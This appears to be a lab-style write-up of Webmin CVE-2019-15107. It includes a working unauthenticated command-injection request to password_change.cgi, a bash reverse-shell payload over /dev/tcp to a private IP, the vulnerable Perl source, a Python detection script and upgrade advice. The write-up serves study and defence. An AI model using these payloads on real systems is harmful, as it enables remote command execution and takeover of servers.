Webmin Remote Command Execution Vulnerability
1. CVE ID
CVE-2019-15107
2. Description
Webmin is a web-based administration and configuration tool for Unix-like systems. Its password-reset page contains a command injection vulnerability that requires no authentication; through it an attacker can execute arbitrary system commands on the host.
3. Affected versions
Webmin <= 1.920 is affected.
4. Exploitation (walkthrough)
4.1 Start the environment
Open the lab target at https://127.0.0.1:10000/
Open https://127.0.0.1:10000/password_change.cgi
4.2 Reproducing the vulnerability
Capture the request with Burp Suite and modify the packet as follows:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
Alternatively, use HackBar to send the POST request and add the payload to it.
After the request is sent, the output of the injected id command appears in the page response.
4.3 Further exploitation
Try a reverse shell command.
URL-encode the payload first:
bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"
Listen on port 4444 on Kali, then send the request.
The reverse shell connects back to Kali.
4.4 Root cause
The problem lies in password_change.cgi. Note the qx/$in{'old'}/ call on the old-password error path below: the unverified old parameter is passed straight to the shell.
#!/usr/bin/perl
# password_change.cgi
# Actually update a user's password by directly modifying /etc/shadow

BEGIN { push(@INC, "."); };
use WebminCore;

$ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";
&init_config();
&ReadParse();
&get_miniserv_config(\%miniserv);
$miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";

# Validate inputs
$in{'new1'} ne '' || &pass_error($text{'password_enew1'});
$in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});

# Is this a Webmin user?
if (&foreign_check("acl")) {
    &foreign_require("acl", "acl-lib.pl");
    ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();
    if ($wuser->{'pass'} eq 'x') {
        # A Webmin user, but using Unix authentication
        $wuser = undef;
    }
    elsif ($wuser->{'pass'} eq '*LK*' ||
           $wuser->{'pass'} =~ /^\!/) {
        &pass_error("Webmin users with locked accounts cannot change ".
                    "their passwords!");
    }
}
if (!$in{'pam'} && !$wuser) {
    $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||
        die "Missing password file configuration";
}

if ($wuser) {
    # Update Webmin user's password
    $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
    # Vulnerable line: $in{'old'} is executed via qx// (shell backticks) when the old password does not match
    $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
    $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
    $perr && &pass_error(&text('password_enewpass', $perr));
    $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
    $wuser->{'temppass'} = 0;
    &acl::modify_user($wuser->{'name'}, $wuser);
    &reload_miniserv();
}
elsif ($gconfig{'passwd_cmd'}) {
    # Use some configured command
    $passwd_cmd = &has_command($gconfig{'passwd_cmd'});
    $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");

    &foreign_require("proc", "proc-lib.pl");
    &clean_environment();
    $ENV{'REMOTE_USER'} = $in{'user'};   # some programs need this
    $passwd_cmd .= " ".quotemeta($in{'user'});
    ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);
    &reset_environment();
    while(1) {
        local $rv = &wait_for($fh,
                '(new|re-enter).*:',
                '(old|current|login).*:',
                'pick a password',
                'too\s+many\s+failures',
                'attributes\s+changed\s+on|successfully\s+changed',
                'pick your passwords');
        $out .= $wait_for_input;
        sleep(1);
        if ($rv == 0) {
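Two defender-side checks that follow from the root cause above, written as an added example (not code from the original write-up or from the Webmin project): flag password_change.cgi requests whose old parameter carries shell metacharacters, as in the request shown in 4.2, and scan a copy of password_change.cgi for the qx/$in{'old'}/ construct so a trojaned file can be spotted before or after upgrading. The sample request body and CGI excerpt are constructed from the text on this page; the function names are my own.

```python
"""Defender-side checks for CVE-2019-15107 (added example, not part of the
original write-up): (1) inspect a form-encoded POST body to
password_change.cgi for shell metacharacters in the `old` parameter;
(2) scan Perl source for the qx/$in{'old'}/ construct quoted above."""
import re
from urllib.parse import parse_qs

# A password field is only ever compared, never executed, so pipe, semicolon,
# backticks, $( ) and redirection characters are a strong injection signal.
SHELL_META = re.compile(r"[|;&`$(){}<>\n]")

# The exact construct from the vulnerable CGI: the unverified `old` parameter
# is interpolated into qx// (backtick execution) on the wrong-password path.
BACKDOOR_RE = re.compile(r"qx/\$in\{'old'\}/")


def flag_request(body: str) -> dict:
    """Parse a POST body and report whether `old` looks like command injection."""
    params = parse_qs(body, keep_blank_values=True)
    old = params.get("old", [""])[0]
    return {
        "user": params.get("user", [""])[0],
        "expired": params.get("expired", [""])[0],
        "old": old,
        "suspicious": bool(SHELL_META.search(old)),
    }


def scan_cgi_source(source: str) -> list:
    """Return 1-based line numbers where qx/$in{'old'}/ appears in the CGI source."""
    return [n for n, line in enumerate(source.splitlines(), 1) if BACKDOOR_RE.search(line)]


# Constructed samples: the request body from section 4.2 and the three lines
# around the vulnerable call in password_change.cgi.
SAMPLE_BODY = "user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2"
SAMPLE_CGI = """\
$enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
$perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
"""

if __name__ == "__main__":
    print(flag_request(SAMPLE_BODY))   # suspicious: True, old: 'test|id'
    print(scan_cgi_source(SAMPLE_CGI))  # [2]
```

Run scan_cgi_source over the password_change.cgi installed under the Webmin directory; a clean file from the official repository yields an empty list.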
5. Attachments
6. Remediation
Fixes:
- Upgrade to version 1.930
- Download the clean password_change.cgi file from GitHub and replace the affected file
7. References
8. Vulnerability class
Remote command execution (RCE)